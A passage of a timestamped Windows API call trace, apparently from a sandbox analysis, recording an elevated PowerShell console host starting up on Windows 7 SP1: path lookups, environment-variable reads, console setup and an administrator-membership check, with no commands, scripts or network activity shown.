	[0136.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1cd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0136.728] SetErrorMode (uMode=0x1) returned 0x1
	[0136.729] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1cd900 | out: lpFileInformation=0x1cd900*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0136.729] SetErrorMode (uMode=0x1) returned 0x1
	[0137.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.774] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0137.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.774] CoTaskMemFree (pv=0x23f020) 
	[0137.777] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0137.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.777] CoTaskMemFree (pv=0x23f020) 
	[0137.778] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0137.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.778] CoTaskMemFree (pv=0x23f020) 
	[0137.781] CoCreateGuid (in: pguid=0x1cdcc8 | out: pguid=0x1cdcc8*(Data1=0x4c79b281, Data2=0xd8e8, Data3=0x4193, Data4=([0]=0xb8, [1]=0x67, [2]=0xb1, [3]=0x0, [4]=0xaa, [5]=0x8, [6]=0x47, [7]=0x26))) returned 0x0
	[0137.784] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0137.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.784] CoTaskMemFree (pv=0x23f020) 
	[0137.788] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0137.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.788] CoTaskMemFree (pv=0x23f020) 
	[0137.791] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0137.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.791] CoTaskMemFree (pv=0x23f020) 
	[0137.799] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0137.891] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1cd970 | out: lpConsoleScreenBufferInfo=0x1cd970) returned 1
	[0137.898] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0137.898] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1cd970 | out: lpConsoleScreenBufferInfo=0x1cd970) returned 1
	[0137.900] GetVersionExW (in: lpVersionInformation=0x1cd900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cd900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0137.903] GetCurrentProcess () returned 0xffffffffffffffff
	[0137.904] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1cd998 | out: TokenHandle=0x1cd998*=0x338) returned 1
	[0137.910] GetTokenInformation (in: TokenHandle=0x338, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cd8b8 | out: TokenInformation=0x0, ReturnLength=0x1cd8b8) returned 0
	[0137.911] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2482e0
	[0137.912] GetTokenInformation (in: TokenHandle=0x338, TokenInformationClass=0x8, TokenInformation=0x2482e0, TokenInformationLength=0x4, ReturnLength=0x1cd8b8 | out: TokenInformation=0x2482e0, ReturnLength=0x1cd8b8) returned 1
	[0137.912] DuplicateTokenEx (in: hExistingToken=0x338, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1cda18 | out: phNewToken=0x1cda18*=0x334) returned 1
	[0137.913] GetTokenInformation (in: TokenHandle=0x338, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cd8b8 | out: TokenInformation=0x0, ReturnLength=0x1cd8b8) returned 0
	[0137.913] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x248310
	[0137.913] GetTokenInformation (in: TokenHandle=0x338, TokenInformationClass=0x8, TokenInformation=0x248310, TokenInformationLength=0x4, ReturnLength=0x1cd8b8 | out: TokenInformation=0x248310, ReturnLength=0x1cd8b8) returned 1
	[0137.913] CheckTokenMembership (in: TokenHandle=0x334, SidToCheck=0x2cf5ef0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1cda28 | out: IsMember=0x1cda28) returned 1
	[0137.914] CloseHandle (hObject=0x334) returned 1
	[0137.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.075] CoTaskMemAlloc (cb=0x804) returned 0x1b830990
	[0138.075] GetConsoleTitleW (in: lpConsoleTitle=0x1b830990, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0138.155] CoTaskMemFree (pv=0x1b830990) 
	[0138.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.750] SetConsoleCtrlHandler (HandlerRoutine=0x28d68dc, Add=1) returned 1
	[0138.765] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0138.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0138.765] CoTaskMemFree (pv=0x23f020) 
	[0138.874] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0138.876] CoCreateGuid (in: pguid=0x1cdb10 | out: pguid=0x1cdb10*(Data1=0x2ab29b2a, Data2=0x6203, Data3=0x41a1, Data4=([0]=0x99, [1]=0xae, [2]=0x22, [3]=0xa6, [4]=0x47, [5]=0x48, [6]=0x96, [7]=0x84))) returned 0x0
	[0138.878] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0138.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0138.878] CoTaskMemFree (pv=0x23f020) 
	[0138.914] WinSqmIsOptedIn () returned 0x0
	[0138.915] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0138.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0138.915] CoTaskMemFree (pv=0x23f020) 
	[0138.916] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0138.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0138.916] CoTaskMemFree (pv=0x23f020) 
	[0138.916] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0138.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0138.916] CoTaskMemFree (pv=0x23f020) 
	[0138.918] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0138.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0138.918] CoTaskMemFree (pv=0x23f020) 
	[0138.918] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0139.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.044] CoTaskMemFree (pv=0x23f020) 
	[0139.045] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0139.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.045] CoTaskMemFree (pv=0x23f020) 
	[0139.046] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0139.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.046] CoTaskMemFree (pv=0x23f020) 
	[0139.047] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0139.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.047] CoTaskMemFree (pv=0x23f020) 
	[0139.056] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0139.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.056] CoTaskMemFree (pv=0x23f020) 
	[0139.073] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0139.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.074] CoTaskMemFree (pv=0x23f020) 
	[0139.075] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0139.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.075] CoTaskMemFree (pv=0x23f020) 
	[0139.075] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0139.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.075] CoTaskMemFree (pv=0x23f020) 
	[0139.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
